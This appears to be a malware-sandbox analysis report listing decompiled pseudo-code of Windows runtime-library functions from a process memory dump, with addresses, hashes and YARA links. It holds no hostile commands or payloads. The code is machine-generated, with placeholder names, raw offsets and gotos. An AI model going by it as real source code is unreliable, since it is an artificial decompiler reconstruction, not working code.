					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x2a47b10 =  *0x2a47b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x2a4536c; // 0xab59f0
					if( *_t51 != 0x2a45368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x2a45368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x2a4536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0298A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0298a61c
0x0298a61e
0x0298a623
0x0298a628
0x0298a62b
0x0298a62d
0x0298a648
0x0298a64a
0x0298a64f
0x029c9b44
0x0298a6ec
0x0298a6f1
0x0298a6f1
0x0298a655
0x0298a657
0x0298a65a
0x0298a65d
0x0298a662
0x0298a663
0x0298a667
0x0298a668
0x0298a66d
0x0298a706
0x0298a706
0x029c9bda
0x029c9be6
0x029c9beb
0x00000000
0x029c9beb
0x0298a679
0x029c9b7a
0x00000000
0x029c9b7a
0x0298a683
0x0298a6f4
0x0298a6f7
0x0298a6f9
0x0298a6fd
0x0298a6a0
0x0298a6a0
0x0298a6ad
0x0298a6af
0x0298a6b4
0x029c9ba7
0x029c9bac
0x00000000
0x00000000
0x029c9bc6
0x029c9bce
0x029c9bd1
0x029c9bd3
0x029c9bd3
0x00000000
0x029c9bd1
0x0298a6bd
0x0298a6c3
0x0298a6c6
0x0298a6d2
0x0298a701
0x0298a704
0x00000000
0x0298a704
0x0298a6d4
0x0298a6d6
0x0298a6d9
0x0298a6db
0x0298a6e1
0x0298a6e6
0x0298a6e8
0x0298a6e8
0x0298a6ea
0x00000000
0x0298a6ea
0x0298a688
0x0298a692
0x0298a694
0x0298a699
0x00000000
0x00000000
0x0298a69d
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb75177fedcf0d141546d26e6817fadda04cb80e6620fe44cd7158e6eebefc6
Instruction ID: b802ecf3b222c734a9967aa30c6aabdc878b618c8136a438a4ba8d91406e5881
Opcode Fuzzy Hash: 0bb75177fedcf0d141546d26e6817fadda04cb80e6620fe44cd7158e6eebefc6
Instruction Fuzzy Hash: FF4158B5E00205DFDB15DF58C890BA9BBF2BB89704F2984AEE904AB344C775E901CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02993D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02993D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E02967B60(0, _t61, 0x29311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E02967B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L02974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x02993d4c
0x02993d50
0x02993d55
0x02993d5e
0x029ce79a
0x00000000
0x029ce79a
0x02993d68
0x029ce789
0x02993d9d
0x02993da3
0x02993daf
0x02993db5
0x02993dbc
0x02993dc4
0x02993dc9
0x02993dce
0x029ce7ae
0x029ce7ae
0x02993dde
0x02993de2
0x02993de7
0x02993e0d
0x02993e13
0x02993e16
0x02993e1e
0x02993e25
0x02993e28
0x00000000
0x00000000
0x02993e2a
0x02993e2f
0x02993e37
0x02993e37
0x00000000
0x02993e37
0x02993e31
0x00000000
0x02993e31
0x02993e20
0x02993e20
0x02993e35
0x00000000
0x02993de9
0x02993de9
0x02993de9
0x02993dee
0x02993dfd
0x02993dff
0x02993e02
0x02993e05
0x02993e05
0x00000000
0x02993df0
0x02993de7
0x029ce78f
0x029ce794
0x02993d79
0x02993d84
0x02993d89
0x02993d8e
0x00000000
0x029ce7a4
0x02993d96
0x02993d9a
0x00000000
0x02993d9a
0x00000000
0x029ce794
0x02993d6e
0x02993d73
0x00000000
0x029ce7b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd08adb42c9bfe22e705b88beebcde3038d2721797925c0e3a10f0b74676398
Instruction ID: 01fb7ad3b797fd8b0eb68e9a33b9ad4b3a2448ef63b952617f6dd06bad9eaea3
Opcode Fuzzy Hash: 1dd08adb42c9bfe22e705b88beebcde3038d2721797925c0e3a10f0b74676398
Instruction Fuzzy Hash: 8931AE31A05615DBCB258F6EC851A7BBBF9EF85720B1584BEE84ACB350E730D840C799

Uniqueness

Uniqueness Score: -1.00%

Function 029D7016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E029D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x2a4d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E029D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E029D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E02977D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E02999AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0299B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L02974620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x029d7016
0x029d701e
0x029d702b
0x029d7033
0x029d7037
0x029d703c
0x029d703e
0x029d7041
0x029d7045
0x029d704a
0x029d7050
0x029d7055
0x029d705a
0x029d7062
0x029d7062
0x029d705a
0x029d7064
0x029d7064
0x029d7067
0x029d7071
0x029d7096
0x029d709b
0x029d70a2
0x029d70a6
0x029d70a7
0x029d70ad
0x029d70b3
0x029d70b6
0x029d70bb
0x029d70c3
0x029d70c3
0x029d70c6
0x029d70cd
0x029d70dd
0x029d70e0
0x029d70e2
0x029d70e2
0x029d70ee
0x029d7101
0x029d70f0
0x029d70f9
0x029d70f9
0x029d710a
0x029d710e
0x029d7112
0x029d7117
0x029d7118
0x029d7118
0x029d70bb
0x029d711d
0x029d7123
0x029d7131
0x029d7131
0x029d7136
0x029d713d
0x029d713e
0x029d713f
0x029d714a
0x029d714a
0x029d7084
0x029d7088
0x00000000
0x029d708e
0x029d708e
0x029d7092
0x00000000
0x029d7092

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c66c702b0a145d5b0888fdb0412299ac82f3ac133f3f173c0211a3f4736196e6
Instruction ID: 78158c248338fa95fd375056b40dc8b53d1f20365c6ac47d74a58a98709f711d
Opcode Fuzzy Hash: c66c702b0a145d5b0888fdb0412299ac82f3ac133f3f173c0211a3f4736196e6
Instruction Fuzzy Hash: A231A6726047519BC320DFA8C940AAAF7E9FFC8704F048A2DF89587694E730E904DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0297C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0297C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E02977D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E02A28D34(_v8, _t80);
					}
					E02972280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0296FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E02A28833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0296FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0299B180();
						if(_a4 != 0) {
							E02972280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0297BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0297BB2D(_t16, _t15);
						E0297B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0296FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0296FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0296FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0297c18d
0x0297c18f
0x0297c191
0x0297c19b
0x0297c1a0
0x0297c1d4
0x0297c1de
0x029c2d6e
0x0297c1e4
0x0297c1e4
0x0297c1e4
0x0297c1ec
0x029c2d7d
0x029c2d7d
0x0297c1f3
0x0297c1ff
0x029c2d88
0x029c2d8d
0x029c2d94
0x029c2d94
0x029c2d9f
0x029c2da4
0x029c2dab
0x029c2db0
0x029c2db2
0x029c2db3
0x029c2db4
0x029c2dbc
0x029c2dc3
0x029c2dc3
0x0297c205
0x0297c205
0x0297c208
0x0297c20e
0x0297c211
0x0297c216
0x0297c219
0x0297c21f
0x0297c222
0x0297c22c
0x0297c234
0x0297c23a
0x0297c23f
0x0297c245
0x0297c24b
0x0297c251
0x0297c25a
0x0297c276
0x0297c27d
0x0297c27d
0x0297c25c
0x0297c25c
0x00000000
0x0297c25e
0x0297c1a4
0x0297c1aa
0x0297c1b3
0x0297c265
0x0297c26c
0x0297c26c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 67eb0a72cbbe4c601329a2189a624966f1543ded808cd327610f0ead25d272c4
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: D6312672B01546BED704EBB4D490BF9FB99BF92304F14416BD41C57201DB38AA49CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0298A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0298A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x2a47b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x2a47b10 = 8;
					 *0x2a47b14 = 0x2a47b0c;
					 *0x2a47b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E0298A990(0x2a47b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0298A840(__edx, __ecx, __ecx, _t52, 0x2a47b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x2a47b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x2a47b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x2a47b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L02974620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x2a47b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E0299F3E0(_t50,  *0x2a47b14, _t8 >> 3);
						_t28 =  *0x2a47b14; // 0x77f07b0c
						__eflags = _t28 - 0x2a47b0c;
						if(_t28 != 0x2a47b0c) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x2a47b14 = _t50;
						_t48 = _v12;
						 *0x2a47b10 = _t9;
						goto L6;
					}
					 *0x2a47b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0298a713
0x0298a714
0x0298a717
0x0298a71d
0x0298a720
0x0298a722
0x0298a727
0x0298a74a
0x0298a754
0x0298a75e
0x0298a768
0x0298a76a
0x0298a773
0x0298a78b
0x0298a790
0x0298a792
0x0298a741
0x0298a741
0x0298a743
0x0298a749
0x0298a749
0x0298a732
0x0298a73a
0x0298a797
0x0298a79d
0x0298a7a3
0x0298a7a9
0x0298a7b6
0x0298a7bc
0x0298a7ca
0x0298a7e0
0x0298a7e2
0x0298a7e4
0x029c9bf2
0x00000000
0x029c9bf2
0x0298a7ed
0x0298a7f2
0x0298a800
0x0298a805
0x0298a80d
0x0298a812
0x029c9c08
0x029c9c08
0x0298a818
0x0298a81b
0x0298a821
0x0298a824
0x00000000
0x0298a824
0x0298a7ae
0x00000000
0x0298a7ae
0x0298a73c
0x0298a73e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387cc478c7cb1214b7de9236609d96e55d1271d2ca4763f82e4cf6a0fc0dedea
Instruction ID: 2e3bdaf68fb797e01d4345ef6312c10f7c86575bc5c8ed24e5d63a23f596758f
Opcode Fuzzy Hash: 387cc478c7cb1214b7de9236609d96e55d1271d2ca4763f82e4cf6a0fc0dedea
Instruction Fuzzy Hash: 5231BCB9A40680ABD711DF08DC90F29B7F9FBC4790F184D5AE20687240DB76E913CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0295AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0295AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x2a4d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x2a47b9c; // 0x0
					_t53 = L02974620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0299B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0299F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L02966C59(_t53, _t51, _t58) != 0) {
							_t28 = E02985E50(0x293c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0298B230(_v32, _v28, 0x293c2d8, 1,  &_v24);
								_t28 = E0295F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x0295aa25
0x0295aa29
0x0295aa2d
0x0295aa30
0x0295aa37
0x0295aa3c
0x029b4458
0x029b4458
0x029b4472
0x029b4474
0x029b4476
0x0295aa64
0x0295aa74
0x029b447c
0x029b4483
0x029b4492
0x0295aa52
0x0295aa54
0x0295aa5e
0x029b44a8
0x029b44ad
0x029b44af
0x029b44b6
0x029b44b6
0x029b44b9
0x029b44bc
0x029b44cd
0x029b44d3
0x029b44d6
0x029b44e1
0x029b44e1
0x029b44e6
0x029b44e8
0x029b44fb
0x029b44fb
0x029b44e8
0x00000000
0x0295aa5e
0x029b4476
0x0295aa42
0x0295aa46
0x0295aa48
0x0295aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5134a829805e979ecc6fd4289b74cf7a401c6306321f8c35e496c149cdc10adf
Instruction ID: 1336e1076c2fc130536072a219d5fba3a3bdc4ff6388778452528ec7ada0a949
Opcode Fuzzy Hash: 5134a829805e979ecc6fd4289b74cf7a401c6306321f8c35e496c149cdc10adf
Instruction Fuzzy Hash: FA31E572A00529ABCF11EF64CD41ABFB7BAEF44700F014469F905E7150E7749921DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 029861A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E029861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E02985E50(0x29367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E02A29D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0295F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x029861b3
0x029861b5
0x029861bd
0x029861c3
0x029861c7
0x029861d2
0x029861ff
0x029861ff
0x02986201
0x02986207
0x02986207
0x029861d4
0x029861d9
0x00000000
0x00000000
0x029861df
0x029861e2
0x00000000
0x00000000
0x029861e6
0x029861e8
0x029861ee
0x029861ee
0x029861f9
0x029c762f
0x029c7632
0x029c7635
0x029c7639
0x029c7640
0x029c766e
0x029c7675
0x00000000
0x00000000
0x029c7681
0x029c7689
0x029c768d
0x029c7691
0x029c7695
0x029c7699
0x029c76af
0x029c76b5
0x029c76b7
0x029c76b7
0x029c76d7
0x029c76dc
0x00000000
0x029c76dc
0x029c76a2
0x029c76a9
0x029c7651
0x029c7653
0x029c7653
0x029c7656
0x029c7656
0x00000000
0x029c7656
0x029c7644
0x029c7646
0x029c7648
0x029c7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98f4b2d5963e5669ead8c438fdac39b7511ceb480fc54530e0b0a581ceb1ad9
Instruction ID: baa0ef9e7b9a9b23eb184c026c7cff6fe914c1361d45f1b6dd1d868e7c90acbf
Opcode Fuzzy Hash: f98f4b2d5963e5669ead8c438fdac39b7511ceb480fc54530e0b0a581ceb1ad9
Instruction Fuzzy Hash: ED316B72A057018FD360EF59C940B66F7E9FB88B04F19496DE8949B252D770E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02998EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02998EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x2a4d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E02984E70(0x2a486e4, 0x2999490, 0, 0);
					if( *0x2a453e8 > 5 && E02998F33(0x2a453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
